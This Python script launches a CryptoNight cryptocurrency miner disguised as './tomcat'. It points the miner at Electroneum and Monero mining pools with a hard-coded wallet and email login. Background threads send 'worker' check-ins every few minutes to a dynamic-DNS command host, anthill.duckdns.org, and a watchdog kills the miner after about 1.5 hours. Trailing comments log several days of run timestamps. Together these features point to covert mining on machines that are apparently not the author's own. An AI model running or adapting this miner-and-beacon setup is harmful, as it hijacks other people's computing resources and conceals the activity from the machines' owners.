import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:53:01.706504
#2018-02-17 17:42:01.765630
#2018-02-17 19:31:03.534043
#2018-02-17 21:20:04.937472
#2018-02-17 23:04:01.791206
#2018-02-18 00:51:04.621370
#2018-02-18 02:38:06.264500
#2018-02-18 04:24:07.405016
#2018-02-18 06:16:03.762146
#2018-02-18 08:06:04.660789
#2018-02-18 09:52:07.857698
#2018-02-18 11:39:06.064640
#2018-02-18 13:24:05.991554
#2018-02-18 15:14:06.875302
#2018-02-18 17:03:03.810940
#2018-02-18 18:50:03.374775
#2018-02-18 20:37:03.502352
#2018-02-18 22:23:05.252066
#2018-02-19 00:12:07.093361
#2018-02-19 01:59:04.099836
#2018-02-19 03:45:08.604857
#2018-02-19 05:31:05.029989
#2018-02-19 07:19:06.212704
#2018-02-19 09:08:04.330315
#2018-02-19 10:56:07.610537
#2018-02-19 12:45:10.284942
#2018-02-19 14:34:09.665910
#2018-02-19 16:22:04.690312
#2018-02-19 18:09:06.858160
#2018-02-19 19:55:07.978955
#2018-02-19 21:43:08.551086
#2018-02-19 23:31:04.853027
#2018-02-20 01:17:05.236675
#2018-02-20 03:07:01.879546
#2018-02-20 04:53:07.055099
#2018-02-20 06:36:02.081951
#2018-02-20 08:21:08.371274
#2018-02-20 10:06:08.467757
#2018-02-20 11:50:09.626273
#2018-02-20 13:38:09.682494
#2018-02-20 15:23:06.997290
#2018-02-20 17:09:05.877452
#2018-02-20 18:59:01.537243
#2018-02-20 20:48:05.871101
#2018-02-20 22:34:08.303212
#2018-02-21 00:17:03.776102
#2018-02-21 02:19:05.618458
#2018-02-21 04:06:07.876875
#2018-02-21 05:53:03.702624
#2018-02-21 07:41:08.913763
#2018-02-21 09:26:02.210408
#2018-02-21 11:14:07.585272
#2018-02-21 13:01:07.788705
#2018-02-21 14:49:02.006965
#2018-02-21 16:38:01.874360
#2018-02-21 18:27:08.782668
#2018-02-21 20:13:01.668140
#2018-02-21 22:01:02.180606
#2018-02-21 23:47:07.383103
#2018-02-22 01:37:01.470329
#2018-02-22 03:24:07.662663
#2018-02-22 05:12:06.956902
#2018-02-22 06:56:07.253086
#2018-02-22 08:45:09.859712
#2018-02-22 10:33:05.490756
#2018-02-22 12:19:05.934838
#2018-02-22 14:03:08.902312
#2018-02-22 15:50:04.661127
#2018-02-22 17:37:01.468334
#2018-02-22 19:23:08.230719
#2018-02-22 21:14:08.756818
#2018-02-22 22:59:09.190799
#2018-02-23 00:46:08.541194
#2018-02-23 02:33:05.153241
#2018-02-23 04:22:05.769857
#2018-02-23 06:07:06.395791
#2018-02-23 07:52:08.268265
#2018-02-23 09:49:04.424705
#2018-02-23 11:49:05.804085
#2018-02-23 13:38:06.479718
#2018-02-23 15:26:08.797460
#2018-02-23 17:17:01.758881
#2018-02-23 19:01:02.133822
#2018-02-23 20:47:04.435051
#2018-02-23 22:35:10.150079
#2018-02-24 00:21:01.233252
#2018-02-24 02:13:08.238172
#2018-02-24 04:03:06.753663
#2018-02-24 05:48:07.585712
#2018-02-24 07:34:01.908755
#2018-02-24 09:20:07.631860
#2018-02-24 11:15:01.582413
#2018-02-24 13:04:05.423984
#2018-02-24 14:52:06.145780
#2018-02-24 16:43:01.309064
#2018-02-24 18:32:01.728491
#2018-02-24 20:18:05.356978
#2018-02-24 22:11:05.351154
#2018-02-25 01:08:05.856553
#2018-02-25 04:48:07.884262
#2018-02-25 09:12:02.093358